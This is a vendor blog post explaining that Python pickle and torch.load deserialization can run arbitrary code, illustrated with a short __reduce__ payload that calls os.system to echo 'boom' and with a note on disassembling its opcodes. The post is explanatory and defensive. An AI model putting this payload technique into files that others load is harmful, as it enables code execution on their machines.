During the last moments of 2021, we learned of a new vulnerability in a previously inconspicuous library called “Log4j”. What started out as a bug report soon escalated into a worldwide national-security event. Disruptions were felt throughout myriad popular services. Google reportedly had 500 engineers going through its codebases for impact analysis. The U.S. federal government issued an emergency directive requiring its agencies to mitigate the vulnerability immediately. Attacks by nation-state actors in China, Iran, and North Korea were detected in real time. CVE-2021-44228 received a CVSS score of 10.0, indicating the highest possible severity. Memes were made.
We won’t go into too much technical detail here. However, the spine-chilling crux of the Log4j exploit is that it allowed attackers to execute arbitrary code in privileged processes on many, many servers throughout the world. Crucially, “arbitrary” here means, well, anything.
Should you care?
You’re a data scientist or an ML engineer. You don’t use Log4j (or don’t know that you do...). You don’t even use Java. You wouldn’t be caught dead using any JVM-based language. You just use Python. You’re all set. Well… do you use pickle files? Or any other Python serializers? Does the snippet “model = torch.load(path)” ring any bells?
If you do, or your team does, you might want to bear with us here, as your organization’s internal machines might be at a risk similar to the one Log4j-using machines used to face.
You probably serialize
Modern data science is not done in a vacuum. Practitioners rely heavily on open-source and third-party shared models and benchmark data. This can be a good thing: globally available, shared artifacts help companies quickly adopt new, state-of-the-art algorithmic approaches and datasets, which is crucial in today’s reality of unprecedentedly fast progress. Without adopting third-party models, a production system can quickly become obsolete. However, are the sources of these artifacts, and their distribution chain, always trustworthy? Are they safe to use?
To answer that, let’s examine serialization. Serialization is the mechanism by which third-party models and data are typically imported into your process memory. It solves a problem that almost every programmer, especially one dealing with data, encounters daily: writing in-memory objects into files so they can be stored persistently and shared, and later “deserialized” back into process memory.
Pickle serialization is amazing
To most programmers, using Pickle (or serializers built on top of it, like the one PyTorch uses) seems like a form of typical Python magic. It’s so simple! Consider the following piece of code:
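(What follows is a sketch of what such code might look like; the class name A, the value 3, the use of json inside print(), and the file name myfile.pkl come from the surrounding text, while the rest, including keeping A in its own small module so the loading script can find it, is our own filler.)

```python
# a_module.py (hypothetical helper module)
import json

class A:
    def __init__(self, x):
        self.x = x

    def print(self):
        # json is used here only to illustrate a point made below:
        # the loading script never imports json itself
        print(json.dumps(self.x))
```

```python
# save_script.py
import pickle

from a_module import A

a = A(3)
with open("myfile.pkl", "wb") as f:
    pickle.dump(a, f)
```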
and voila, your object of type A is stored under myfile.pkl. Then,
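a second script along these lines might be used to load it back (again a sketch; only the printed value “3” and the absence of an explicit json import come from the text):

```python
# load_script.py
import pickle  # note: no "import json" anywhere in this script

with open("myfile.pkl", "rb") as f:
    a = pickle.load(f)

a.print()  # prints: 3
```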
if you run this once the object is serialized (by the first script), you will notice that a neatly contains your deserialized object, and the script successfully prints “3”.
This seems so natural, but let’s stop for a second and appreciate a few things that Pickle is doing for us here. First, those of us who have ever written a custom class whose objects are serializable into a non-pickle format (e.g. JSON, or in a programming language other than Python) will greatly appreciate the fact that, with Pickle, you usually don’t have to write any custom serialization code. Pickle takes care of deciding the order of field serialization, the storage memory layout, recursive calls to serialize non-primitive object fields, and almost everything else. Second, notice that the second script never imports json, yet the call to a.print() “magically” manages to use json functionality. How convenient!
No free lunch
Unfortunately, pickle’s incredibly simple interface comes at a cost. Pickle’s deserializer, which runs whenever we invoke “pickle.load” (or “torch.load”!), is a full-fledged virtual machine, able to run arbitrary code within the process that loads the object. It is expressly built to allow serialized objects to come with arbitrary instructions on how to deserialize them. In other words, Pickle deserialization readily supports running arbitrary code specified by the serializer (the original author of the file). Crafting such a payload is, in fact, as simple as a few lines of code, using the designated “__reduce__” method. For example, try the following (you can replace “torch” with “pickle” and “save” with “dump”). Feel free to also jump to the Appendix below for a slightly more in-depth view of the Pickle virtual machine’s opcodes.
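A minimal sketch of such a payload (the class name Payload is our own; the echoed command is the one used in the Appendix below):

```python
import os

import torch  # the same demo works with pickle.dump / pickle.load

class Payload:
    # __reduce__ tells the unpickler how to "rebuild" this object;
    # here, rebuilding it means calling os.system('echo "boom"')
    def __reduce__(self):
        return (os.system, ('echo "boom"',))

# anyone you hand this file to...
torch.save(Payload(), "payload.pt")

# ...runs your command the moment they load it
# (recent PyTorch releases default to weights_only=True, which
# refuses payloads like this one; older versions execute it as-is)
torch.load("payload.pt")  # prints: boom
```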
Python’s documentation cautions against loose usage of pickle deserialization. Pickle was meant for efficiency and ease of use, not security, the manual warns us in a scary bright orange box.
Not use Pickle? That train left.
Unfortunately, despite the (in)security of using Pickle to deserialize files of untrusted origin being known for years, and despite explicit recommendations against it in the documentation, doing just that has become standard practice. Extremely popular libraries like Hugging Face Transformers use pickle (or Torch serialization) freely to share and import models, as do many (most?) of the implementations you will find on artifact-sharing sites like Model Zoo. Deserializing Pickle files of questionable provenance, and thus exposing oneself to arbitrary code execution, has become second nature to data scientists.
Can Pickle be fixed?
Unfortunately, Pickle will not be “fixed” (=be made secure) in a future version, nor is there a straightforward way to detect or prevent exploits. Pickle’s vulnerability is tightly tied to its impressive usefulness. In technical terms, Pickle’s virtual machine is not a sandbox, and neither is Python’s interpreter — which means that getting a guarantee of safe deserialization for arbitrary files is going to be a formidable challenge.
What can we do?
At Robust Intelligence, we run a series of stress tests that also include Pickle file security. Contact us to learn more!
Appendix: Disassembling Pickles
Below, we see the “disassembled” (=made human-readable) pickle VM opcodes for our “payload” class. Even without knowing the opcode semantics, which we will not get into here, we can guess that this code loads the “posix.system()” function (equivalent to “os.system”) and calls it, passing the string ‘echo “boom”’ as its argument.
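The disassembly can be reproduced with Python’s built-in pickletools module (a sketch; the Payload class name is our own):

```python
import os
import pickle
import pickletools

class Payload:
    def __reduce__(self):
        return (os.system, ('echo "boom"',))

# prints one line per opcode; expect the strings 'posix' and 'system'
# being pushed and combined into a global reference (GLOBAL or
# STACK_GLOBAL, depending on the protocol), the argument 'echo "boom"'
# being pushed, and a final REDUCE opcode that performs the call,
# followed by STOP
pickletools.dis(pickle.dumps(Payload()))
```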